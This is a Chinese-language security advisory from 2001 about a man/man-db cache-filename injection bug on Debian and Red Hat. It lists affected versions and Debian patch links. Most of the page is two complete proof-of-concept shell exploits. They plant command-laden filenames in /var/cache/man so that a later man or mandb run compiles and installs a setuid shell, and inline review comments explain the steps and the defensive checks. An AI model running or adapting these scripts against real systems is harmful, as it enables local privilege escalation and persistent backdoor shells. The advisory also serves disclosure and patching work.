
Linux man 可建立恶意 cache 文件漏洞


发布时间:2001-06-13
更新时间:2001-06-13
严重程度:
威胁程度:本地管理员权限
错误类型:竞争条件
利用方式:服务器模式

受影响系统
Debian Linux 2.3
Debian Linux 2.2
Debian Linux 2.1
RedHat Linux 7.1
RedHat Linux 7.0
RedHat Linux 6.2
RedHat Linux 6.1
详细描述
本地用户可以让 man 把预设 man 搜索路径以外的文件缓存到系统缓存目录中。
结合 'man'、'mandb' 或其他信任缓存文件名的程序，可以利用这个漏洞
提升权限。

测试代码
#!/bin/sh
###################################################
# Fri May 18 22:08:42 JAVT 2001                   #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs            #
# proof of concept.                               #
# version affected:                               #
#   <= man-1.5h1-20                               #
#                                                 #
# tested on:                                      #
#  redhat7.1 -> any user suidshell                #
#                                                 #
# by jenggo <luki@karet.org>                      #
#                                                 #
# thanx to: echo, mayonaise all @ #karet          #
###################################################
# hmmm ... can anyone modify this into instant root ?? :P
#
# NOTE(review) - what this script does, read from the code below:
#   * It builds a fake man tree under /tmp (a man1 page plus a cat1
#     symlink) and a world-writable /tmp/mine holding a helper "manx".
#   * The cat1 entry is a symlink whose *target string* is a path into
#     the real cache followed by ';'-separated shell commands.  The sgid
#     man binary is invoked exactly once ('man -d huhuy') with a relative
#     $PATH, and the closing check only tests whether a cache file with
#     that command-laden name now exists in the system cache dir.  The
#     bug class is therefore: a filename taken from a user-influenced
#     search path is trusted and later reused, unquoted, by a shell.
#   * No privilege is gained while this script runs.  Per its own
#     closing message the payload fires only when some other user runs
#     'man netconf' (DEADLY_BIN); manx then builds a setuid shell for
#     whichever uid executed it (it reads `id -u` at that moment).
#   Defensive reading: audit /var/cache/man (or /var/cache/catman) for
#   entries whose names contain ';' or whitespace, check whether man is
#   still setgid, and install the vendor fix referenced by the advisory.

# IMPORTANT !
# set this to command that has no man page
# (the poisoned cache entry is named after it - see the final check)
DEADLY_BIN="netconf"

# on <= redhat6.2 could be /var/cache/catman
CACHEDIR="/var/cache/man"
CACHEDIR2="/var/cache/catman"

GZ="/bin/gzip"

# --- preflight: locate the system cat-page cache directory ------------
echo -n "check man dir ..."

if [ ! -d $CACHEDIR ]; then
  if [ -d $CACHEDIR2 ]; then
    CACHEDIR=$CACHEDIR2
    echo "OK"
  else
    echo "FAILED"
    echo "check your man dir"
    exit
  fi
else
  echo "OK"
fi

# --- preflight: the bug only matters if man carries extra group rights
# ('-g' tests the setgid bit); a man-db install is a different code base
# and is handled by the second script on this page
echo -n "checking sgid/suid man ..."
if [ ! -g /usr/bin/man ]; then
# is it a debian man?
  if [ -d /usr/lib/man-db ]; then
    echo "FAILED"
    echo "I think this is debian style man, use other script"
  else
    echo "FAILED"
    echo "can't find executables sgid man binary"
  fi
  exit
else
  echo "OK"
fi

# --- staging area under /tmp -------------------------------------------
# /tmp/mine is made world-writable (0777); the deferred payload writes
# its C source and binaries there
echo "making our man directory ..."
echo

mkdir -p /tmp/man/man1
mkdir /tmp/cat1
mkdir /tmp/mine
chmod 777 /tmp/mine

# a throw-away gzipped "man page" so that 'man huhuy' has something to find
echo "creating our man page ..."
echo

echo "BEBAS EUY"|$GZ -c > /tmp/man/man1/huhuy.1.gz

# --- the injection vector ----------------------------------------------
# The symlink is harmless by itself; the problem is its target string,
# which is only dangerous if a consumer splices it unquoted into a shell
# command line.  'export PATH=.' makes the bare 'manx' at the end resolve
# to a file in whatever directory the 'cd ..' chain ends up in.
echo "creating symlink ..."
echo

ln -s "$CACHEDIR/cat1/netconf.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" /tmp/cat1/huhuy.1.gz

# empty placeholder; presumably meant to be found through the relative
# $PATH set further down - not verifiable from this file
echo "creating our bogus command ..."
echo
touch /tmp/huhuy

# --- the deferred payload: /tmp/mine/manx --------------------------------
# Written through an *unquoted* heredoc, so the backslash-escaped \$ and
# \` are what keep $VICTIM and the id(1) substitution for the generated
# script instead of expanding them now.  When manx eventually runs it
# compiles a small C program that setreuid()s to the uid that ran manx
# and execs /bin/sh, then marks the binary setuid+setgid (6755).  The
# generated C source is written to, and deleted from, the 0777 dir.
echo "making manx shellscript"
echo

/bin/cat > /tmp/mine/manx <<EOF
#!/bin/sh

export PATH="/bin:/usr/bin:/sbin:/usr/sbin"
VICTIM=\`/usr/bin/id -u\`

/bin/cat >/tmp/mine/my"\$VICTIM".c <<EOG
#include <stdio.h>
void main()
{
  char *hh[2]={"/bin/sh", NULL};
  setreuid(\$VICTIM,\$VICTIM);
  execve(hh[0], hh, NULL);
}
EOG

/usr/bin/gcc /tmp/mine/my"\$VICTIM".c -o /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null

/bin/rm -f /tmp/mine/my"\$VICTIM".c 1>/dev/null 2>/dev/null

chmod 6755 /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null

EOF

chmod 755 /tmp/mine/manx

# bail out (and remove the staging files) if the helper is not executable,
# e.g. /tmp mounted noexec
if [ ! -x /tmp/mine/manx ]; then
  echo "file: /tmp/mine/manx can't be set executable !"
  echo "fix the exploit first"
  echo "cleaning up ..."
  /bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
  exit
fi

# --- trigger ---------------------------------------------------------------
# A *relative* PATH pointing at /tmp, evaluated from '/'.  The script
# relies on man deriving its search path from $PATH (the "MANPATH"
# bug named in the header) - that behaviour is not verifiable here.
echo "prepare to exploit ..."
echo

export PATH=../../../../../../tmp
cd /

# the single call to the sgid binary; '-d' is man's debug mode, output discarded
echo "exploiting ..."
echo

/usr/bin/man -d huhuy 2>/dev/null

# restore a sane PATH for the remainder of this script
export PATH=/bin:/usr/bin

# --- verification ----------------------------------------------------------
# NOTE(review): this test hard-codes /var/cache/man instead of using
# $CACHEDIR, so on a host where the CACHEDIR2 fallback was selected the
# check reports failure even if the cache entry was created.  On the
# success path the staging files under /tmp are deliberately left behind.
echo "checking our exploit result"
echo

if [ -f "/var/cache/man/cat1/$DEADLY_BIN.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" ]; then
  echo "content of $CACHEDIR/cat1:"
  ls -l $CACHEDIR/cat1
  echo
  echo "exploit OK, now wait till somebody run 'man $DEADLY_BIN'"
  echo "and your suidshells will be waiting at /tmp/mine/* :)"
  echo "bye."
  echo "[-------- jenggo <luki@karet.org> --------]"
  echo
else
  echo "hrrmm ... exploit failed to create offending file !"
  echo "check again please"
  echo "cleaning up ..."
  /bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
fi

---------------------------------------------------------------

#!/bin/sh
###################################################
# Fri Jun  1 23:00:10 JAVT 2001                   #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs            #
# proof of concept.                               #
# version affected:                               #
#   <= man-db 2.3.16-3,2.3.17-3.2                 #
#                                                 #
# tested on:                                      #
#  debian2.2 -> instant man suidshell             #
#                                                 #
# by jenggo <luki@karet.org>                      #
#                                                 #
# thanx to: echo, mayonaise all @ #karet          #
# ==> Mr.dur,amien,mega,akbar ... peace,peace ;)  #
###################################################
# NOTE(review) - what this script does, read from the code below:
#   Same bug class as the man-1.5 script above (a filename from a
#   user-influenced man tree is later reused unquoted by a shell), but
#   aimed at Debian's man-db.  Here the command string is the man page's
#   own filename, and $TMPDIR/man/cat1 is a symlink into the real
#   /var/cache/man/cat1 so the cat page written by man(1) lands there
#   under that name.  Stage two runs /usr/lib/man-db/mandb, which walks
#   the cache; the script expects that to execute "mandeb" with the
#   rights of the 'man' user (uid 6 - inferred only from the 'chown man'
#   line and the "Hope it's owned by man" message), which then installs
#   a setuid binary at /tmp/huhu.  The end result is a shell as 'man',
#   not root; the advisory's "local admin" rating presumably reflects
#   what that account can in turn plant in the cache.
#   Defensive reading: cache entries containing ';' in their names, an
#   unexpected setuid binary owned by man, and the man-db versions above
#   are the things to check; the fixed Debian packages are listed in
#   the solution section of this page.

TMPDIR=/tmp/mywork

# 'RAND' is just the current seconds value (60 possible values), not random
RAND=`/bin/date +%S`
echo "making working dir ..."
/bin/mkdir -p $TMPDIR/man/man1
/bin/chmod 777 $TMPDIR
/bin/chmod 777 $TMPDIR/man

# NOTE(review): this guard cleans up but never exits, so on a missing
# tool the script carries on and the cp/gcc calls below simply fail
echo "copying needed files ..."
if [ ! -x /usr/bin/groff ] || [ ! -x /usr/bin/grotty ] || [ ! -x /usr/bin/troff ] || [ ! -x /usr/bin/gcc ]; then
  echo "Failed, I need executable : groff,grotty,troff,gcc"
  echo "cleaning up ..."
  /bin/rm -rf $TMPDIR
fi

# private copies of the formatters; presumably required because $PATH is
# set to $TMPDIR alone before man(1) is invoked - not verifiable here
/bin/cp /usr/bin/groff $TMPDIR
/bin/cp /usr/bin/grotty $TMPDIR
/bin/cp /usr/bin/troff $TMPDIR

# helper 1 ("hehe"): switches to uid/gid 6 and execs /bin/sh
echo "compiling helper ..."
/bin/cat > $TMPDIR/hehe.c <<EOF
#include <stdio.h>

int main()
{
  char *aa[2]={"/bin/sh", NULL};
    
  setreuid(6,6);
  execve(aa[0], aa, NULL);
  exit(0);
}
EOF

/usr/bin/gcc $TMPDIR/hehe.c -o $TMPDIR/hehe 2>/dev/null 1>/dev/null

# helper 2 ("mandeb"): the program named at the end of the injected
# string.  It assumes it already runs with uid 6 rights, copies hehe to
# /tmp/huhu and makes it setuid (4755) owned by man.  Paths are
# hard-coded, so TMPDIR cannot be changed without editing this source.
/bin/cat > $TMPDIR/mandeb.c <<EOF
#include <stdio.h>

int main()
{
  seteuid(6);
  setuid(6);
  system("/bin/cp /tmp/mywork/hehe /tmp/huhu");
  system("/bin/chown man /tmp/huhu");
  system("/bin/chmod 4755 /tmp/huhu");
  exit(0);
}
EOF

/usr/bin/gcc $TMPDIR/mandeb.c -o $TMPDIR/mandeb 2>/dev/null 1>/dev/null

# --- the injection vector ----------------------------------------------
# cat1 is redirected into the real cache, and the page name itself carries
# the ';'-separated command string (the trailing 'echo ls' keeps the name
# ending in ".1.gz").  The touch creates the same name, minus the suffix,
# directly in $TMPDIR - presumably so it resolves on $PATH; not verified.
echo "making our manpage ..."
/bin/ln -s /var/cache/man/cat1 $TMPDIR/man/cat1
/bin/echo "bebas euy"|/bin/gzip -c > $TMPDIR/man/man1/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls.1.gz"
/bin/touch $TMPDIR/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls"
# stage 1: man(1) runs with $PATH = $TMPDIR only; the expected side effect
# is a cat page with the command-laden name inside /var/cache/man/cat1
export PATH=$TMPDIR
/usr/bin/man "cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls" 2> /dev/null 1>/dev/null

echo "/bin/ls -la /var/cache/man/cat1"
/bin/ls -la /var/cache/man/cat1
# /var/cache is put first on PATH for the mandb stage; the 'cd ..' chain in
# the filename is relative to wherever its consumer happens to be
export PATH=/var/cache:/bin:/sbin:/usr/bin:/usr/sbin

# stage 2: mandb rebuilds its index from the cache and, per the script's
# expectation, ends up running the injected string - i.e. "mandeb".
# The working dir is removed right afterwards, whether or not that worked.
echo "exploiting ..."
/bin/rm -f /tmp/huhu
/usr/lib/man-db/mandb 2>/dev/null 1>/dev/null
/bin/rm -rf /tmp/mywork

echo
echo "/bin/ls -la /tmp"
/bin/ls -la /tmp

# '-u' tests only the setuid bit; ownership is not checked, hence "Hope"
if [ -u /tmp/huhu ]; then
  echo "file /tmp/huhu is setuid. Hope it's owned by man"
  echo "Have a nice day"
  echo "[----- jenggo <luki@karet.org> -----]"
  /tmp/huhu
else
  echo "exploit failed, cleaning up our binary ..."
fi

# NOTE(review): this expands to /tmp//tmp/mywork, which does not exist;
# the working dir was already removed above and /tmp/huhu is never
# removed on either branch despite the "cleaning up" messages.
echo "cleaning up our preparation step dir ..."
/bin/rm -rf /tmp/$TMPDIR

解决方案
下载补丁:

Debian Linux 2.2:

Debian upgrade 2.2 alpha man-db_2.3.16-4_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/man-db_2.3.16-4_alpha.deb

Debian upgrade 2.2 arm man-db_2.3.16-4_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/man-db_2.3.16-4_arm.deb

Debian upgrade 2.2 i386 man-db_2.3.16-4_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/man-db_2.3.16-4_i386.deb

Debian upgrade 2.2 m68k man-db_2.3.16-4_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/man-db_2.3.16-4_m68k.deb

Debian upgrade 2.2 ppc man-db_2.3.16-4_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/man-db_2.3.16-4_powerpc.deb

Debian upgrade 2.2 sparc man-db_2.3.16-4_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/man-db_2.3.16-4_sparc.deb

相关信息